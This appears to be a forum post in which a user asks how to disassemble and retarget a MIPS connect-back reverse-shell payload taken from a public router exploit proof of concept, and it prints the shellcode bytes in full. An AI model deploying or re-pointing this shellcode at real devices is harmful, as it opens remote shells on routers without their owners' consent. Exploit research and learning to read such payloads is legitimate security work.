I am attempting to edit a reverse shell that was coded by Zach Cutlip for an exploit he wrote for SOHO routers. Here is a link to his source code project.
https://github.com/zcutlip/exploit-poc/tree/master/netgear/wndr3700v3His reverse shell that is written in Python appears to contain what I believe is machine code for a MIPS based piece of hardware. The reverse shell specifies a reverse IP. I would like to learn how to reverse his machine code so that I can recreate the shell and have it refer to a different reverse IP.
I looked through the documentation but everything seemed to point to compiling assembly to make machine code not the other way around. Can someone please point me in the right direction?
Thanks,
Mike
connect_back=["\xfd\xff\x0f\x24\x27",
"x'20'", #SQL escape
"\xe0\x01\x27\x28\xe0\x01\xff\xff\x06\x28",
"\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f",
"\xfd\xff\x0f\x24\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x7a\x69\x0e\x3c",
"\x7a\x69\xce\x35\xe4\xff\xae\xaf\x0a\x0a",
"x'0d'", #SQL escape
"\x3c\x0a\x0a\xad\x35",
"\xe6\xff\xad\xaf\xe2\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01",
"\x4a\x10\x02\x24\x0c\x01\x01\x01\xfd\xff\x0f\x24\x27\x28\xe0\x01",
"\xff\xff\xa4\x8f\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa5",
"x'20'", #SQL escape
"\xff\xff\x01\x24\xfb\xff\xa1\x14\xff\xff\x06\x28\x62\x69\x0f\x3c",
"\x2f\x2f\xef\x35\xf4\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35",
"\xf8\xff\xae\xaf\xfc\xff\xa0\xaf\xf4\xff\xa4\x27\xd8\xff\xa4\xaf",
"\xff\xff\x05\x28\xdc\xff\xa5\xaf\xd8\xff\xa5\x27\xab\x0f\x02\x24",
"\x0c\x01\x01\x01\xff\xff\x06\x28"]
Update: I have converted the machine code in to MIPS assembly language using
http://acade.au7.de/disasmips/disasmips.htmNow I just need to learn how to read MIPS Assembly language....
